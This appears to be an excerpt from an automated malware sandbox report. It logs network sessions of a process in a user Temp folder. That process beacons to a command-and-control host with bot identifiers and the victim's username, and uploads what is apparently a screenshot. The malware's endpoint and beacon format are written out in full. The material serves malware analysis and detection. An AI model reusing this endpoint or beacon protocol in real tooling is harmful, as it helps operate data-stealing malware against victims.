                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:23:14.809432030 CET1904OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:14.809493065 CET1909OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:23:14.809529066 CET1920OUTData Raw: 4a 00 43 4c 27 34 e2 73 4d a4 c6 86 56 cf 86 7f e4 25 27 fd 71 3f cc 56 2d 6d 78 67 fe 42 52 7f d7 13 fc c5 6b 85 fe 34 4c b1 7f c1 91 d5 d6 ff 00 87 3c 21 a9 f8 96 4d d6 c8 23 b6 53 87 b8 93 ee 83 e8 3d 4d 65 e9 96 2f a9 ea 96 d6 48 42 99 a4 09
                          Data Ascii: JCL'4sMV%'q?V-mxgBRk4L<!M#S=Me/HBQ=uG1PimFU'j^7:Q=pXxUwek->uBHwh-$c>*%K+ l=1^Khh.Fz5Zu$(bi
                          Nov 12, 2021 22:23:14.809900045 CET1924OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:23:14.834769964 CET1971OUTData Raw: 8c 52 f9 c3 f8 51 45 17 64 ba 9e 45 41 1c a7 a2 13 f8 54 8b 6f 31 fe 1c 7d 6a 73 33 f6 c0 a6 99 1f fb c6 8d 49 e7 6c 05 ab 77 75 1f 8d 3c 5b a0 eb 27 e5 51 ee 3e b4 80 d3 b3 25 dd 96 36 40 a7 ef 13 4e df 0a f4 50 6a b6 68 a3 90 9b 16 85 d0 1f 75
                          Data Ascii: RQEdEATo1}js3Ilwu<['Q>%6@NPjhuU\^#,{~`4#7V'QG${*5<_[W/V.>Cd;1^!gGF=nl5}NPF;m)hV(\$|.<oZO7Z$dW


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          120192.168.2.449905178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:43.636862040 CET6596OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:43.663896084 CET6597INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:43 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          121192.168.2.449906178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:43.791893959 CET6597OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:43.814974070 CET6599INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:43 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:23:43.815002918 CET6599INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          122192.168.2.449907178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:44.602356911 CET6600OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:44.628036976 CET6613INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:44 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          123192.168.2.449908178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:44.618961096 CET6600OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:44.619299889 CET6600OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:44.619872093 CET6610OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:44.620507002 CET6613OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:44.642594099 CET6617OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:44.642673969 CET6630OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:23:44.642718077 CET6634OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:23:44.643074036 CET6637OUTData Raw: e4 77 a7 cd 17 ba 17 2c 96 cc b2 74 b8 4f 47 a6 9d 20 ff 00 0b d3 04 cc 3b d3 d6 e1 c7 43 4e d4 df 41 5e aa ea 44 74 a9 87 4c 1a 89 b4 fb 85 3f 70 d5 f1 76 e3 bd 4a 97 8d de 8f 67 49 ec 1e d6 aa 32 4d ac c3 f8 0f e5 4d 31 38 ea a6 b7 85 da 9e ab
                          Data Ascii: w,tOG ;CNA^DtL?pvJgI2MM18NobvZ?-4Z?A_V}}j=Qvm*[?%')biHm&QQ:u)}JXV>~T)F1Shaq8p+IpH%:S AO
                          Nov 12, 2021 22:23:44.643176079 CET6639OUTData Raw: 8c 52 f9 c3 f8 51 45 17 64 ba 9e 45 41 1c a7 a2 13 f8 54 8b 6f 31 fe 1c 7d 6a 73 33 f6 c0 a6 99 1f fb c6 8d 49 e7 6c 05 ab 77 75 1f 8d 3c 5b a0 eb 27 e5 51 ee 3e b4 80 d3 b3 25 dd 96 36 40 a7 ef 13 4e df 0a f4 50 6a b6 68 a3 90 9b 16 85 d0 1f 75
                          Data Ascii: RQEdEATo1}js3Ilwu<['Q>%6@NPjhuU\^#,{~`4#7V'QG${*5<_[W/V.>Cd;1^!gGF=nl5}NPF;m)hV(\$|.<oZO7Z$dW
                          Nov 12, 2021 22:23:44.665523052 CET6651OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:44.665595055 CET6666OUTData Raw: 24 f0 cc b2 e9 b1 5d c5 a9 69 f2 49 34 13 5c c1 6a 0c a2 59 a3 89 98 3b 2e 50 2f f0 31 c1 60 70 3a 76 aa e9 a1 dd 3e a7 05 80 96 df cd 9a c8 5f 29 dc 76 88 fc 93 36 0f 1d 76 8f a6 7b f7 ab 17 1e 23 58 b4 0d 2a d2 c2 da cc ea 31 d9 5c 41 35 d9 8e
                          Data Ascii: $]iI4\jY;.P/1`p:v>_)v6v{#X*1\A5A%iTuH@#4?AiDi@`v0wv{c5VIw4[?wWu<j)d2x*pH#SxjKIYuO,Bw@dHjC}&_-r[+YE+9
                          Nov 12, 2021 22:23:44.714025021 CET6710INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:44 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37
                          Nov 12, 2021 22:23:44.763657093 CET6711OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:44.789958000 CET6711INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:44 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          124192.168.2.449909178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:44.933182955 CET6712OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:44.958759069 CET6712INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:44 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


